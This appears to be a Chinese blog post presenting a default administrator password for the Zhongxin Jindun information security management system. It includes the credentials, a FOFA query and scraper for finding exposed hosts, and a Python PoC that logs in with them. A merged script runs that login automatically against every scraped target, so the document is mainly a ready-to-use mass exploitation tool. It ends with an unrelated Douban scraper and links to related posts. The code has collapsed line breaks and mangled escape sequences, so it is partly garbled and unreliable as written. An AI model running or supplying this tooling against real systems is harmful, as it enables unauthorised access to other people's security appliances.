中新金盾信息安全管理系统存在默认密码
FOFA查询:title=“中新金盾信息安全管理系统”
系统默认管理员账号密码:admin/zxsoft1234!@#$
1、查找中新金盾信息安全管理系统的poc:
import re
import requests
# 获取网页内容
r = requests.get('https://fofa.so/result?qbase64=dGl0bGU9IuS4reaWsOmHkeebvuS%2FoeaBr%2BWuieWFqOeuoeeQhuezu%2Be7nyI%3D')
data = r.text# 利用正则查找所有连接
link_list =re.findall(r"(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')" ,data)
for url in link_list:print(url)
2、漏洞脚本
import requests
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+ 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m')print('+ 33[34mGithub : https://github.com/PeiQi0 33[0m')print('+ 33[34m公众号 : PeiQi文库 33[0m')print('+ 33[34mVersion: 中新金盾信息安全管理系统 默认超级管理员密码漏洞 33[0m')print('+ 33[36m使用格式: python3 poc.py 33[0m')print('+ 33[36mUrl >>> http://xxx.xxx.xxx.xxx 33[0m')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_url + "?q=common/getcode"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)print("33[36m[o] 正在获取验证码 {}?q=common/getcode ..... 33[0m".format(target_url))response_data = response.headers['Set-Cookie']check_code = re.findall(r'check_code=(.*?);', response_data)[0]PHPSESSID = re.findall(r'PHPSESSID=(.*?);', response_data)[0]print("33[36m[o] 验证码:{}n[o] PHPSESSID:{} 33[0m".format(check_code, PHPSESSID))POC_2(target_url, check_code, PHPSESSID)except Exception as e:print("33[31m[x] 请求失败 33[0m", e)def POC_2(target_url, check_code, PHPSESSID):vuln_url = target_url + "?q=common/login"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Cookie":"PHPSESSID={}; check_code={}".format(PHPSESSID, check_code),"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}data = "name=admin&password=zxsoft1234!%40%23%24&checkcode={}&doLoginSubmit=1".format(check_code)try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)if "1" in response.text and response.status_code == 200:print("33[36m[o] 目标 {} 存在默认管理员弱口令 admin / zxsoft1234!@#$ 33[0m".format(target_url))else:print("33[31m[x] 目标 {} 不存在默认管理员弱口令 33[0m".format(target_url))except Exception as e:print("33[31m[x] 请求失败 33[0m", e)if __name__ == '__main__':title()target_url = str(input("33[35mPlease input Attack UrlnUrl >>> 33[0m"))POC_1(target_url)
运行之后,输入IP,结果如下:
合并1、2
import requests
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarningimport re
import requests
r = requests.get('https://fofa.so/result?qbase64=dGl0bGU9IuS4reaWsOmHkeebvuS%2FoeaBr%2BWuieWFqOeuoeeQhuezu%2Be7nyI%3D')
data = r.text# 利用正则查找所有连接
link_list =re.findall(r"(?<=a href=\").+?(?=\")" ,data)
def title():print('+------------------------------------------')print('+ POC_Des: http://wiki.peiqi.tech ')print('+ Github : https://github.com/PeiQi0 ')print('+ Version: 中新金盾信息安全管理系统 默认超级管理员密码漏洞 ')print('+ 使用格式: python3 poc.py ')print('+ Url >>> http://xxx.xxx.xxx.xxx ')print('+------------------------------------------')
def POC_1(target_url):vuln_url = target_url + "?q=common/getcode"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)print(" 正在获取验证码 {}?q=common/getcode ..... ".format(target_url))response_data = response.headers['Set-Cookie']check_code = re.findall(r'check_code=(.*?);', response_data)[0]PHPSESSID = re.findall(r'PHPSESSID=(.*?);', response_data)[0]print(" 验证码: PHPSESSID:{} ".format(check_code, PHPSESSID))POC_2(target_url, check_code, PHPSESSID)except Exception as e:print("[x] 请求失败 ", e)def POC_2(target_url, check_code, PHPSESSID):vuln_url = target_url + "?q=common/login"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Cookie":"PHPSESSID={}; check_code={}".format(PHPSESSID, check_code),"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}data = "name=admin&password=zxsoft1234!%40%23%24&checkcode={}&doLoginSubmit=1".format(check_code)try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)if "1" in response.text and response.status_code == 200:print("目标 {} 存在默认管理员弱口令 admin / zxsoft1234!@#$ 33[0m".format(target_url))else:print("目标 {} 不存在默认管理员弱口令 33[0m".format(target_url))except Exception as e:print("33[31m[x] 请求失败 33[0m", e)for url in link_list:if "http" in url:if __name__ == '__main__':title()POC_1(url)
结果则自动运行。。。
3、一个爬取豆瓣评分排名的poc
import urllib.request
import reheaders ={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36"
}url="https://movie.douban.com/j/chart/top_list?type=11&interval_id=100%3A90&action=&start=0&limit=100"req=urllib.request.Request(url,headers=headers)data=urllib.request.urlopen(req).read().decode()
pat1=r'"rating":\["(.*?)","\d+"\]'
pat2=r'"title":"(.*?)"'pettern1=re.compile(pat1)
pettern2=re.compile(pat2)data1=pettern1.findall(data)
data2=pettern2.findall(data)for x in range(len(data1)):print("排名:",x+1,"电影名:",data2[x],"豆瓣评分:",data1[x])
运行结果如下:
中新金盾信息安全管理系统存在默认密码相关推荐
- 中新金盾DDOS软件防火墙——防御CC攻击的好帮手
针对当前的DOS/DDOS攻击现状,安徽中新软件自主研发的抗拒绝服务产品--金盾抗DDOS防火墙,具有很强的DOS/DDOS攻击的防护能力.并可在多种网络环境下轻松部署,保证网络的整体性能和可靠性. ...
- 中新金盾软防产品介绍
金盾软防简要介绍金盾软防价格对比 针对当前的DOS/DDOS***现状,安徽中新软件自主研发的抗拒绝服务产品--金盾抗DDOS防火墙,具有很强的DOS/DDOS***的防护能力.并可在多种网络环境下轻 ...
- linux 创建目录 默认权限,如何设置UNIX/Linux中新创建目录或文件的默认权限
在unix或者linux中,每创建一个文件或者目录时,这个文件或者目录都具有一个默认的权限,比如目录755,文件644,那么这些默认权限是怎么控制的呢? 答案是"umask"权限掩 ...
- Linux——安全权限(禁止添加新用户+umask值+修改默认密码最长有效期)
目录 一.不再允许添加新用户的请求 演示: 二.umask值: (1)简介: (2)查看: (3)为什么 umask 里目录是 022,文件是 002? (4)演示: (5)更改: 三.修改默认的密码 ...
- Linux如何查询目录默认权限,如何设置UNIX/Linux中新创建目录或文件的默认权限
在unix或者linux中,创建一个新文件或者目录时,这个文件或者目录都具有一个默认的权限,比如目录755,文件644,这些默认权限是由umask(权限掩码)来控制的,一般umask默认值为022,其 ...
- webbrowser打开指定html,C#实现 WebBrowser中新窗口打开链接用默认或者指定浏览器打开,不用IE...
首先要捕获打开链接的事件,这个事件在 WebBrowser的NewWindow里面. 这里我的WebBrowser命名为announce.所以捕获事件如下: private void announce ...
- 新kali版本,root默认密码
新版本kali root密码不是toor,而是kali/kali 更改root密码: 先用创建的普通用户密码登录,然后打开终端输入: sudo su 登录成功用户名会从自己创建变成root 然后输入命 ...
- 常见网络设备/应用的默认密码的几种收集方式
有时候在做测试时候,可能一个默认密码就进去了,汇总几种 百度/Google/社工 自己百度orGoogle密码,弄不到就找到客服联系方式,伪装成购买设备后不知道默认密码的向厂商客服询问 几个网络设备默 ...
- 网络安全设备默认密码
因为触及敏感词v-p-n,需要将 '-'去掉. 设备 默认账号 默认密码 深信服产品 sangfor sangfor sangfor@2018 sangfor@2019 深信服科技 AD dlanre ...
最新文章
- 请求时的编码问题 Use body.encode(‘utf-8‘) if you want to send it encoded in UTF-8
- halcon知识:ncc_model模板匹配
- Java集合中的排序API分析
- OSPF动态路由协议入门简介
- 【动态规划】线性dp P1043 数字游戏
- EasyRecovery——一款专业的数据恢复软件
- SpringBoot中级篇-SpringBatch+Oracle配置
- VGG16网络结构与代码
- 2023北京航空航天大学计算机考研信息汇总
- 【金猿人物展】龙盈智达首席数据科学家王彦博:量子科技为AI大数据创新发展注入新动能...
- 提升自己的实力才是硬道理
- iphone app 的图标上被自动添加一层半透明遮罩(玻璃效果),小米3这样的高分屏icon不生效,怎么破?
- 7-2 愿天下有情人都是失散多年的兄妹 (25 分)
- DSPE-Thiol; DSPE-SH; 二硬脂酰磷脂酰乙醇胺改性巯基
- 宋君强 学科评估 计算机科学,宋君强
- 日期间隔计算器-计算两个日期之间相差多少天-计算某天之后的多少天是几号计算器
- 详解Material Design体系组件
- 2019秋招|已拿BAT等7家offer大佬的秋招总结建议
- powerbuilder11的体验[转载]
- 生成Jupyter Lab快捷方式
热门文章
- 小程序实现签到打卡功能--用户端
- Office - 如何压缩excel中图片大小
- linux代码怎么运行gedit,Linux中gedit命令起什么作用呢?
- 小羊驼和你一起学习cocos2d-x之六(lua、android.mk)
- 南航计算机科学与技术学院老师,关于南航计算机科学与技术学院第七期科创基金项目教师课题征集的通知...
- Python3 快速入门(一)
- 二维排样规则算法php,一种实用的二维不规则零件排样算法
- 【Latex】伪代码及字体大小
- 哪个国家大学计算机物联网好,物联网专业实力强的大学有哪些
- 2011“国信蓝点杯“软件大赛模拟题java本科组(答案)